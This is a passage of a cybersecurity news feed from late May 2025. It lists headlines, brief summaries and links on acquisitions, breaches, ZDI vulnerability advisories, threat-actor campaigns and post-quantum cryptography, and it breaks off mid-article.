2025-05-29T13:00:00Z | 1748523600

Commvault webinar offers insights on creating strategies for rapid cyber recovery. The post Thrive in Chaos: How to Get Your Minimum Viable Company Back Online appeared first on Commvault - English - United States.

https://www.commvault.com/blogs/thrive-in-chaos-how-to-get-your-minimum-viable-company-back-online
Tenable Announces Intent to Acquire Apex Security to Expand Exposure Management Across the AI Attack Surface
2025-05-29T13:00:00Z | 1748523600

Tenable® Holdings, Inc., the exposure management company, today announced its intent to acquire Apex Security, Inc., an innovator in securing the rapidly expanding AI attack surface. Tenable believes the acquisition, once completed, will strengthen Tenable’s ability to help organizations identify and reduce cyber risk in a world increasingly shaped by artificial intelligence. Generative AI tools and autonomous systems are rapidly expanding the attack surface and introducing new risks — from shadow AI apps and AI-generated code to synthetic identities and ungoverned cloud services. In 2024, Tenable launched Tenable AI Aware which already helps thousands of organizations detect and assess AI usage across their environments. Adding Apex capabilities will expand on that foundation — adding the ability to govern usage, enforce policy, and control exposure across both the AI that organizations use and the AI they build. This move reinforces Tenable’s long-standing strategy of delivering scalable, unified exposure management as AI adoption accelerates.“AI dramatically expands the attack surface, introducing dynamic, fast-moving risks most organizations aren’t prepared for,” said Steve Vintz, Co-CEO and CFO, Tenable. “Tenable’s strategy has always been to stay ahead of attack surface expansion — not just managing exposures, but eliminating them before they can be exploited.”“As organizations move quickly to adopt AI, many recognize that now is the moment to get ahead of the risk — before large-scale attacks materialize,” said Mark Thurmond, Co-CEO, Tenable. “Apex delivers the visibility, context, and control security teams need to reduce AI-generated exposure proactively. It will be a powerful addition to the Tenable One platform and a perfect fit for our preemptive approach to cybersecurity.”Founded in 2023, Apex attracted early interest from CISOs and top investors, including Sam Altman (OpenAI), Clem Delangue (Hugging Face), and venture capital firms Sequoia Capital and Index Ventures. The company quickly emerged as an innovator in securing the use of AI by developers and everyday employees alike — addressing the growing need to manage usage, enforce policy, and ensure compliance at scale. “The AI attack surface is deeply intertwined with everything else organizations are already securing. Treating it as part of exposure management is the most strategic approach. We’re excited to join forces with Tenable to help customers manage AI risk in context — not as a silo, but as part of their broader environment,” said Matan Derman, CEO and Co-Founder of Apex Security.Following the acquisition close, Tenable expects to deliver integrated capabilities in the second half of 2025 as part of Tenable One — the industry’s first and most comprehensive exposure management platform. The financial terms of the deal were not disclosed. The deal is expected to close later this quarter.About TenableTenable® is the exposure management company, exposing and closing the cybersecurity gaps that erode business value, reputation and trust. The company’s AI-powered exposure management platform radically unifies security visibility, insight and action across the attack surface, equipping modern organizations to protect against attacks from IT infrastructure to cloud environments to critical infrastructure and everywhere in between. By protecting enterprises from security exposure, Tenable reduces business risk for approximately 44,000 customers around the globe. Learn more at tenable.com. Forward-Looking StatementsThis press release contains forward-looking information related to Tenable, and its acquisition of Apex Security that involves substantial risks, uncertainties and assumptions that could cause actual results to differ materially from those expressed or implied by such statements. You can generally identify forward-looking statements by the use of forward-looking terminology such as the words: “anticipate,” “believe,” “continue,” “could,” “estimate,” “expect,” “explore,” “evaluate,” “intend,” “may,” “might,” “plan,” “potential,” “predict,” “project,” “seek,” “should,” or “will,” or the negative thereof or other variations thereon or comparable terminology. The forward-looking statements in this press release are based on Tenable’s current plans, objectives, estimates, expectations and intentions and inherently involve significant risks and uncertainties, many of which are beyond Tenable’s control. Forward-looking statements in this communication include, among other things, statements about the potential benefits of the acquisition and product developments and other possible or assumed business strategies, potential growth opportunities, new products, the intended timing of integration of Apex Security’s offerings into Tenable One, and potential market opportunities. Risks and uncertainties include, among other things, our ability to successfully integrate Apex Security’s operations; our ability to implement our plans, forecasts and other expectations with respect to Apex Security’s business; our ability to realize the anticipated benefits of the acquisition, including the possibility that the expected benefits from the acquisition will not be realized or will not be realized within the expected time period; disruption from the acquisition making it more difficult to maintain business and operational relationships; the inability to retain key employees; the negative effects of the consummation of the acquisition on the market price of our common stock or on our operating results; unknown liabilities; attracting new customers and maintaining and expanding our existing customer base; our ability to scale and update our platform to respond to customers’ needs and rapid technological change, increased competition on our market and our ability to compete effectively, and expansion of our operations and increased adoption of our platform internationally.Additional risks and uncertainties that could affect our financial results are included in the section titled “Risk Factors” and “Management’s Discussion and Analysis of Financial Condition and Results of Operations” in our Annual Report on Form 10-K for the year ended December 31, 2024, our Quarterly Report on Form 10-Q for the quarter ended March 31, 2025 and other filings that we make from time to time with the Securities and Exchange Commission (SEC) which are available on the SEC’s website at www.sec.gov. In addition, any forward-looking statements contained in this communication are based on assumptions that we believe to be reasonable as of this date. Except as required by law, we assume no obligation to update these forward-looking statements, or to update the reasons if actual results differ materially from those anticipated in the forward-looking statements.###Contact Information:Investor Relationsinvestors@tenable.comMedia RelationsTenabletenablepr@tenable.com

https://www.tenable.com/press-releases/tenable-announces-intent-to-acquire-apex-security-to-expand-exposure-management-across-the-ai-attack-surface
Billions of cookies up for grabs as experts warn over session security
2025-05-29T12:23:14Z | 1748521394

Law enforcement crackdowns are gathering pace but online marketplaces still teeming with valuable tokens A VPN vendor says billions of stolen cookies currently on sale either on dark web or Telegram-based marketplaces remain active and exploitable.

https://go.theregister.com/feed/www.theregister.com/2025/05/29/billions_of_cookies_available/
Improving National Security Through Secure AI
2025-05-29T12:00:24Z | 1748520024

Wendi Whitmore spoke on a panel of witnesses at a field hearing at Stanford’s Hoover Institution on May 28, outlining the AI innovations our team developed. The post Improving National Security Through Secure AI appeared first on Palo Alto Networks Blog.

https://www.paloaltonetworks.com/blog/2025/05/improving-national-security-through-secure-ai/
Introducing Secure Access – DNS Defense
2025-05-29T12:00:05Z | 1748520005

Cisco Secure Access - DNS Defense is a seamless pathway to our Universal ZTNA solution. Learn how it works in the blog.

https://blogs.cisco.com/security/introducing-secure-access-dns-defense/
Adidas Confirms Data Breach, Security Leaders Weigh In
2025-05-29T12:00:00Z | 1748520000

Security leaders discuss the implications of the Adidas data breach.

https://www.securitymagazine.com/articles/101655-adidas-confirms-data-breach-security-leaders-weigh-in
Do you really need to fix that critical flaw?
2025-05-29T11:56:52Z | 1748519812

Many CVEs represent no risk in a cloud container environment, researchers claim

https://www.itpro.com/security/do-you-really-need-to-fix-that-critical-flaw
How Mature Is Your Identity and Access Management Program?
2025-05-29T11:00:00Z | 1748516400

Identity-based threats continue to rise in frequency and sophistication. Already, more than three-quarters of breaches are identity-based, making it even […]

https://www.guidepointsecurity.com/blog/how-mature-is-your-identity-and-access-management-program/
TCC Bypass vulnerabilities in three macOS applications
2025-05-29T10:55:00Z | 1748516100

TCC Bypass vulnerability has been found in three macOS applications: Poedit (CVE-2025-4280), Viscosity (CVE-2025-4412), DaVinci Resolve (CVE-2025-4081)

https://cert.pl/en/posts/2025/05/tcc-bypass/
Two more NHS Trusts have been hit with cyber attacks – here’s what we know so far
2025-05-29T10:36:58Z | 1748515018

A flaw in a third-party device management tool appears to be the source of the incident

https://www.itpro.com/security/cyber-attacks/two-more-nhs-trusts-have-been-hit-with-cyber-attacks-heres-what-we-know-so-far
DragonForce Exploits SimpleHelp Flaws to Deploy Ransomware Across Customer Endpoints
2025-05-29T10:34:00Z | 1748514840

The threat actors behind the DragonForce ransomware gained access to an unnamed Managed Service Provider's (MSP) SimpleHelp remote monitoring and management (RMM) tool, and then leveraged it to exfiltrate data and drop the locker on multiple endpoints. It's believed that the attackers exploited a trio of security flaws in SimpleHelp (CVE-2024-57727, CVE-2024-57728, and CVE-2024-57726) that were...

https://thehackernews.com/2025/05/dragonforce-exploits-simplehelp-flaws.html
Why Managed Security Services are essential in today’s cyber landscape
2025-05-29T10:30:11Z | 1748514611

In an era where cyber threats are relentless and constantly evolving, where regulatory and industry requirements keep increasing, and where unstaffed information security roles remain a challenge, businesses cannot afford to rely solely on traditional security measures. The complexity of modern security operations requires a proactive approach—one that ensures round-the-clock protection, augments internal capabilities, and seamlessly integrates with multiple vendor products. This is precisely where Managed Security Services (MSS), SOC-as-a-Service, and Managed Detection & Response (MDR) come into play. Industry trends and statistics Recent data highlights the growing reliance on managed security services to address cybersecurity challenges. According to industry research*, a significant number - 29% - of organizations have added MSS solutions to augment their security teams: 23% of organizations are centralizing resources to optimize security operations. 28% are divesting the security team or reducing staff. 37% report no significant changes, indicating a potential gap in security preparedness. These trends underscore the critical need for MSS, SOC-as-a-Service, and MDR solutions to enhance security resilience and mitigate risks effectively. 24x7 Managed Security Services monitoring: why it’s a must Cyber threats don’t take breaks, and neither should your security. Organizations often struggle with maintaining a fully operational Security Operations Center (SOC) that runs efficiently 24/7. MSS and SOC-as-a-Service provide continuous monitoring, threat detection, and incident response, ensuring that potential risks are identified and mitigated before they cause damage. Cost savings: a smarter approach to cybersecurity Maintaining an in-house SOC can be prohibitively expensive, requiring investments in: Technology stack costs including SIEM Retaining skilled personnel for 24x7 operation Certifications, training and compliance Threat research, threat intelligence and forensic capabilities High availability infrastructure and facilities Many organizations, particularly small and mid-sized businesses (SMBs), struggle to allocate resources for full-scale SOC operations. MSS, SOC-as-a-Service and MDR allow companies to outsource cybersecurity expertise without sacrificing quality, often cutting costs by up to 50% compared to an in-house SOC. Additionally, with predictable monthly pricing, organizations can scale security operations efficiently without unexpected budget overruns. Managed Security Services complementing internal teams Many businesses have IT teams tasked with security, but these teams often lack specialized cybersecurity expertise or resources to handle advanced persistent threats (APTs) and complex attack vectors. MSS, SOC-as-a-Service, and MDR solutions complement internal staff by acting as an extension of their security operations, providing additional expertise, automation, and threat intelligence that would otherwise be difficult to maintain in-house. Seamless integration with vendor products With a myriad of cybersecurity tools available today, businesses often struggle with product compatibility and integration. The right MSS, SOC-as-a-Service and MDR providers ensure that your security architecture works harmoniously with vendor products, eliminating gaps in visibility and enforcement while maximizing the value of existing security investments. Compliance benefits: meeting regulatory requirements As cybersecurity risks increase, regulatory compliance has become a top priority for businesses across industries. Organizations handling sensitive data must adhere to frameworks such as: General Data Protection Regulation (GDPR) Health Insurance Portability and Accountability Act (HIPAA) Payment Card Industry Data Security Standard (PCI DSS) Failure to comply with security regulations can result in hefty fines, legal consequences, and reputational damage. MSS, SOC-as-a-Service and MDR help businesses stay compliant by ensuring continuous monitoring, risk assessments, and detailed security reporting. Additionally, many outsourced services enhance audit readiness by offering forensic analysis capabilities, ensuring organizations can respond effectively to regulatory inquiries. The MSS power of OpenText MxDR One standout solution in the MDR space is OpenText Managed Extended Detection and Response (MxDR). OpenText MxDR provides comprehensive 24x7x365 security monitoring, leveraging machine learning and MITRE ATT&CK® behavioral analytics to detect and respond to threats in real time. With a 99% detection rate and low false positives, OpenText MxDR ensures businesses can identify and neutralize cyber threats before they escalate. Additionally, OpenText MxDR boasts an impressive mean time to detect with its EDR Agents, significantly reducing the window of opportunity for attackers. By integrating advanced threat intelligence and endpoint security, OpenText MxDR delivers proactive defense mechanisms that safeguard businesses from emerging threats. Want to learn more about how OpenText MxDR protects your endpoints? Discover how it delivers real-time response, advanced analytics, and endpoint resilience in today’s complex cyber landscape—read the full article. Final thoughts: proactive security is the future Cybersecurity is no longer just about reacting to threats—it’s about proactively defending against them. Managed Security Services, SOC-as-a-Service, and MDR are indispensable components of a modern security strategy, enabling businesses to stay ahead of threats while optimizing internal resources. If your organization hasn’t yet considered these solutions, now is the time. Investing in expert-led security services can mean the difference between a resilient security posture and a costly breach. Ready to take the next step? Let’s secure the future, together. Contact us to learn more. * Source: S&P Global Market Intelligence presentation at RSAC 2025 The post Why Managed Security Services are essential in today’s cyber landscape appeared first on OpenText Blogs.

https://blogs.opentext.com/why-managed-security-services-in-todays-cyber-landscape/
The US Is Storing Migrant Children’s DNA in a Criminal Database
2025-05-29T10:30:00Z | 1748514600

Customs and Border Protection has swabbed the DNA of migrant children as young as 4, whose genetic data is uploaded to an FBI-run database that can track them if they commit crimes in the future.

https://www.wired.com/story/cbp-dna-migrant-children-fbi-codis/
GoTo and Acronis partnership looks to bolster endpoint management for MSPs
2025-05-29T10:30:00Z | 1748514600

The new strategic partnership includes the launch of the LogMeIn Data Protection Suite powered by Acronis

https://www.itpro.com/security/goto-and-acronis-partnership-looks-to-bolster-endpoint-management-for-msps
Cybercriminals camouflaging threats as AI tool installers
2025-05-29T10:00:31Z | 1748512831

Cisco Talos has uncovered new threats, including ransomware like CyberLock and Lucky_Gh0$t, and a destructive malware called Numero, all disguised as legitimate AI tool installers to target victims.

https://blog.talosintelligence.com/fake-ai-tool-installers/
'Haozi' Gang Sells Turnkey Phishing Tools to Amateurs
2025-05-29T10:00:00Z | 1748512800

The phishing operation is using Telegram groups to sell a phishing-as-a-service kit with customer service, a mascot, and infrastructure that requires little technical knowledge to install.

https://www.darkreading.com/threat-intelligence/haozi-gang-sells-turnkey-phishing-tools-amateurs
European Commission: Make Europe Great Again... for startups
2025-05-29T09:26:11Z | 1748510771

Sick of paying the US tech tax and relinquishing talent to other continents, politicians finally wake up The European Commission (EC) has kicked off a scheme to make Europe a better place to nurture global technology businesses, providing support throughout their lifecycle, from startup through to maturity.

https://go.theregister.com/feed/www.theregister.com/2025/05/29/european_commission_wants_tech_startups/
Chinese APT41 Exploits Google Calendar for Malware Command-and-Control Operations
2025-05-29T05:59:00Z | 1748498340

Google on Wednesday disclosed that the Chinese state-sponsored threat actor known as APT41 leveraged a malware called TOUGHPROGRESS that uses Google Calendar for command-and-control (C2). The tech giant, which discovered the activity in late October 2024, said the malware was hosted on a compromised government website and was used to target multiple other government entities. "Misuse of cloud...

https://thehackernews.com/2025/05/chinese-apt41-exploits-google-calendar.html
Over 100,000 WordPress Sites at Risk from Critical CVSS 10.0 Vulnerability in Wishlist Plugin
2025-05-29T05:34:00Z | 1748496840

Cybersecurity researchers have disclosed a critical unpatched security flaw impacting TI WooCommerce Wishlist plugin for WordPress that could be exploited by unauthenticated attackers to upload arbitrary files. TI WooCommerce Wishlist, which has over 100,000 active installations, is a tool to allow e-commerce site customers to save their favorite products for later and share the lists on social...

https://thehackernews.com/2025/05/over-100000-wordpress-sites-at-risk.html
ZDI-CAN-27182: Tencent
2025-05-29T05:00:00Z | 1748494800

A CVSS score 8.8 AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Peter Girnus (@gothburz) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-05-29, 8 days ago. The vendor is given until 2025-09-26 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26921: MLflow
2025-05-29T05:00:00Z | 1748494800

A CVSS score 8.1 AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Mas Fadilullah dzaki' was reported to the affected vendor on: 2025-05-29, 8 days ago. The vendor is given until 2025-09-26 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27305: Fortinet
2025-05-29T05:00:00Z | 1748494800

A CVSS score 8.8 AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Jason McFadyen of Trend Research' was reported to the affected vendor on: 2025-05-29, 8 days ago. The vendor is given until 2025-09-26 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27309: Fortinet
2025-05-29T05:00:00Z | 1748494800

A CVSS score 8.8 AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Jason McFadyen of Trend Research' was reported to the affected vendor on: 2025-05-29, 8 days ago. The vendor is given until 2025-09-26 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27307: Fortinet
2025-05-29T05:00:00Z | 1748494800

A CVSS score 8.8 AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Jason McFadyen of Trend Research' was reported to the affected vendor on: 2025-05-29, 8 days ago. The vendor is given until 2025-09-26 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27308: Fortinet
2025-05-29T05:00:00Z | 1748494800

A CVSS score 8.8 AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Jason McFadyen of Trend Research' was reported to the affected vendor on: 2025-05-29, 8 days ago. The vendor is given until 2025-09-26 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27306: Fortinet
2025-05-29T05:00:00Z | 1748494800

A CVSS score 5.5 AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L severity vulnerability discovered by 'Jason McFadyen of Trend Research' was reported to the affected vendor on: 2025-05-29, 8 days ago. The vendor is given until 2025-09-26 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27004: Glarysoft
2025-05-29T05:00:00Z | 1748494800

A CVSS score 7.3 AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Sharkkcode and Zeze with TeamT5' was reported to the affected vendor on: 2025-05-29, 8 days ago. The vendor is given until 2025-09-26 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27253: Autodesk
2025-05-29T05:00:00Z | 1748494800

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2025-05-29, 8 days ago. The vendor is given until 2025-09-26 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27221: Autodesk
2025-05-29T05:00:00Z | 1748494800

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2025-05-29, 8 days ago. The vendor is given until 2025-09-26 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27222: Autodesk
2025-05-29T05:00:00Z | 1748494800

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2025-05-29, 8 days ago. The vendor is given until 2025-09-26 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27225: Autodesk
2025-05-29T05:00:00Z | 1748494800

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2025-05-29, 8 days ago. The vendor is given until 2025-09-26 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27223: Autodesk
2025-05-29T05:00:00Z | 1748494800

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2025-05-29, 8 days ago. The vendor is given until 2025-09-26 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27226: Autodesk
2025-05-29T05:00:00Z | 1748494800

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2025-05-29, 8 days ago. The vendor is given until 2025-09-26 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26833: Ivanti
2025-05-29T05:00:00Z | 1748494800

A CVSS score 8.8 AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by '06fe5fd2bc53027c4a3b7e395af0b850e7b8a044' was reported to the affected vendor on: 2025-05-29, 8 days ago. The vendor is given until 2025-08-27 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27039: Anritsu
2025-05-29T05:00:00Z | 1748494800

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'kimiya' was reported to the affected vendor on: 2025-05-29, 8 days ago. The vendor is given until 2025-09-26 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27040: Anritsu
2025-05-29T05:00:00Z | 1748494800

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'kimiya' was reported to the affected vendor on: 2025-05-29, 8 days ago. The vendor is given until 2025-09-26 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27287: Apple
2025-05-29T05:00:00Z | 1748494800

A CVSS score 4.3 AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N severity vulnerability discovered by 'Hossein Lotfi (@hosselot) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-05-29, 8 days ago. The vendor is given until 2025-09-26 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-25-310: Linux Kernel ksmbd Session Setup Null Pointer Dereference Denial-of-Service Vulnerability
2025-05-29T05:00:00Z | 1748494800

This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Linux Kernel. Authentication is not required to exploit this vulnerability, but only systems with ksmbd enabled are vulnerable. The ZDI has assigned a CVSS rating of 6.8. The following CVEs are assigned: CVE-2025-22037.

http://www.zerodayinitiative.com/advisories/ZDI-25-310/
ZDI-25-311: (Pwn2Own) Sonos Era 300 Heap-based Buffer Overflow Remote Code Execution Vulnerability
2025-05-29T05:00:00Z | 1748494800

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected Sonos Era 300 speakers. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-1051.

http://www.zerodayinitiative.com/advisories/ZDI-25-311/
Outdated Security, Overlooked Costs: Why Multifamily Properties Must Modernize Now
2025-05-29T05:00:00Z | 1748494800

Many properties still rely on brass keys, manual processes, and disconnected digital tools, all of which appear functional but quietly create operational drag.

https://www.securitymagazine.com/articles/101654-outdated-security-overlooked-costs-why-multifamily-properties-must-modernize-now
The Custodial Stablecoin Rekt Test
2025-05-29T04:00:00Z | 1748491200

Introducing the Custodial Stablecoin Rekt Test; a new spin on the classic Rekt Test for evaluating the security maturity of stablecoin issuers.

https://blog.trailofbits.com/2025/05/29/the-custodial-stablecoin-rekt-test/
Safeguarding Schneider Modicon M241 PLCs - CVE-2025-2875
2025-05-29T03:30:00Z | 1748489400

Vulnerability Discovery in Schneider Modicon M241 PLC by OPSWAT Unit 515

https://www.opswat.com/blog/safeguarding-schneider-modicon-m241-plcs-cve-2025-2875
From Infection to Access: A 24-Hour Timeline of a Modern Stealer Campaign
2025-05-29T03:17:48Z | 1748488668

May 28, 2025The Hacker NewsIdentity Theft / Enterprise Security Stealer malware no longer just steals passwords. In 2025, it steals live sessions—and attackers are moving faster and more efficiently than ever. While many associate account takeovers with personal services, the real threat is unfolding in the enterprise. Flare’s latest research, The Account and Session Takeover […]

https://thecyberpost.com/news/hackers/from-infection-to-access-a-24-hour-timeline-of-a-modern-stealer-campaign/
Iranian Hacker Pleads Guilty in $19 Million Robbinhood Ransomware Attack on Baltimore
2025-05-29T03:17:07Z | 1748488627

May 28, 2025Ravie LakshmananRansomware / Data Breach An Iranian national has pleaded guilty in the U.S. over his involvement in an international ransomware and extortion scheme involving the Robbinhood ransomware. Sina Gholinejad (aka Sina Ghaaf), 37, and his co-conspirators are said to have breached the computer networks of various organizations in the United States and […]

https://thecyberpost.com/news/hackers/iranian-hacker-pleads-guilty-in-19-million-robbinhood-ransomware-attack-on-baltimore/
Why Critical Infrastructure Organizations Need Advanced Email Security Now More Than Ever
2025-05-29T02:35:45Z | 1748486145

The post Why Critical Infrastructure Organizations Need Advanced Email Security Now More Than Ever appeared first on Open Systems.

https://www.open-systems.com/blog/why-critical-infrastructure-organizations-need-advanced-email-security/
Victoria's Secret website laid bare for three days after 'security incident'
2025-05-29T00:30:16Z | 1748478616

Knickers outlet knackered Underwear retailer Victoria's Secret’s website has been down for three days, with the company blaming an unspecified security problem.

https://go.theregister.com/feed/www.theregister.com/2025/05/29/victoria_secrets_outage/
Adversarial AI: The new frontier in financial cybersecurity
2025-05-29T00:19:40Z | 1748477980

The financial sector is adept at balancing risk and opportunity. Adversarial AI is its next big challenge Sponsored Post  From the use of ATMs to online banking, the financial services sector has always been at the forefront of technology. Now, it's leading the charge in AI. In their third annual survey of financial institutions the Bank of England and Financial Conduct Authority found 75% of companies already using AI with another 10% planning to do so over the next three years.

https://go.theregister.com/feed/www.theregister.com/2025/05/29/qa_adversarial_ai_financial_services_2025/
OPSWAT Helps a Government Agency Secure Digital Evidence and Accelerate Investigations
2025-05-29T00:00:00Z | 1748476800

Improving evidence handling and investigation speed with secure, automated file analysis.

https://www.opswat.com/blog/opswat-helps-a-government-agency-secure-digital-evidence-and-accelerate-investigations
Turns Out Network Security Is Cool Again – and It’s Called NDR by Mark Wojtasiak
2025-05-29T00:00:00Z | 1748476800

Gartner names Vectra AI a Leader in Network Detection & Response – positioned highest for Ability to Execute and furthest for Completeness of Vision

https://www.vectra.ai/blog/turns-out-network-security-is-cool-again-and-its-called-ndr
Certified Randomness Uses Quantum Cryptography to Make Stronger Keys
2025-05-28T23:47:17Z | 1748476037

Researchers are using quantum computers to generate keys that are truly random to strengthen data encryption.

https://www.darkreading.com/endpoint-security/certified-randomnes-squantum-cryptography-stronger-keys
Smashing Security podcast #419: Star Wars, the CIA, and a WhatsApp malware mirage
2025-05-28T23:00:17Z | 1748473217

Why is a cute Star Wars fan website now redirecting to the CIA? How come Cambodia has become the world's hotspot for scam call centres? And can a WhatsApp image really drain your bank account with a single download, or is it just a load of hacker hokum? All this and much more is discussed in the latest edition of the award-winning "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Allan Liska.

https://grahamcluley.com/smashing-security-podcast-419/
Securing Financial IT Infrastructure with Data Diodes
2025-05-28T23:00:00Z | 1748473200

It's no secret that cyberthreats against financial institutions are growing more sophisticated. In a 2024 story from the IMF,  they showed that losses from cyber incidents quadrupled since 2017, inflating to $2.5 billion.

https://www.opswat.com/blog/securing-financial-it-infrastructure-with-data-diodes
Thousands of Asus routers are being hit with stealthy, persistent backdoors
2025-05-28T22:12:07Z | 1748470327

Backdoor giving full administrative control can survive reboots and firmware updates.

https://arstechnica.com/security/2025/05/thousands-of-asus-routers-are-being-hit-with-stealthy-persistent-backdoors/
Security startup Horizon3.ai is raising $100M in new round
2025-05-28T21:31:26Z | 1748467886

Horizon3.ai, a cybersecurity startup that provides tools like autonomous penetration testing, is seeking to raise $100 million in a new funding round and has locked down at least $73 million, the company revealed in an SEC filing this week. NEA led the round, according to two people familiar with the deal. One person said that […]

https://techcrunch.com/2025/05/28/security-startup-horizon3-ai-is-raising-100m-in-new-round/
Victoria’s Secret hit by outages as it battles security incident
2025-05-28T20:20:22Z | 1748463622

The fashion retailer's outages began Monday.

https://techcrunch.com/2025/05/28/victorias-secret-hit-by-outages-as-it-battles-security-incident/
Post-Quantum Cryptography Migration Should Start Now: Coalition
2025-05-28T19:40:06Z | 1748461206

As estimates of the quantum computing power needed to crack current public key encryption algorithms continue to drop, a group of technology companies and organizations is urging users to begin migrating toward post-quantum cryptographic standards now. To help organizations with the transition to post-quantum cryptography, the Post-Quantum Cryptography Coalition (PQCC) released a migration roadmap today to guide companies through the phases of that journey. “As quantum computing technology continues to advance, organizations cannot afford to delay preparing for these transformative changes and threats to their security,” Wen Masters, MITRE’s vice president of cyber technologies, said in a statement. MITRE is one of the founding members of PQCC, along with SandboxAQ, PQShield, IBM Quantum and Microsoft. The roadmap’s release comes just days after the publication of a paper that reduced by more than 95% the estimated quantum computing power needed to crack RSA-2048 encryption keys. Quantum Computing Power Needed to Crack RSA-2048 Lowered That paper, by Craig Gidney of Google Quantum AI, updates a 2019 paper Gidney co-authored that estimated that 2048-bit RSA integers could be broken in eight hours by a quantum computer with 20 million noisy qubits. “In this paper, I substantially reduce the number of qubits required,” Gidney wrote in the new paper published on arXiv. “I estimate that a 2048 bit RSA integer could be factored in less than a week by a quantum computer with less than a million noisy qubits.” In a blog post on the paper, Gidney said that current quantum computers with relevant error rates “have on the order of only 100 to 1000 qubits,” and the National Institute of Standards and Technology (NIST) is leading efforts to develop post-quantum cryptographic algorithms “that are expected to be resistant to future large-scale quantum computers. However, this new result does underscore the importance of migrating to these standards in line with NIST recommended timelines.” In a November 2024 report, NIST said that “even if quantum computers are a decade away, organizations must begin the migration to postquantum cryptography today to avoid having their encrypted data exposed once quantum computers become operational in the future.” While certain applications may require post-quantum cryptography (PQC) sooner, NIST and U.S. federal systems have set an “overall goal of achieving widespread PQC adoption by 2035.” In an April update, PQCC noted that only three PQC standards have seen “some adoption” so far: SSH, TLS 1.3, and IKE/IPSec. Here is PQCC’s standards adoption heatmap: [caption id="attachment_103094" align="aligncenter" width="1333"] Post-quantum cryptography standards development and adoption (PQCC)[/caption] Post-Quantum Cryptography Migration Roadmap The 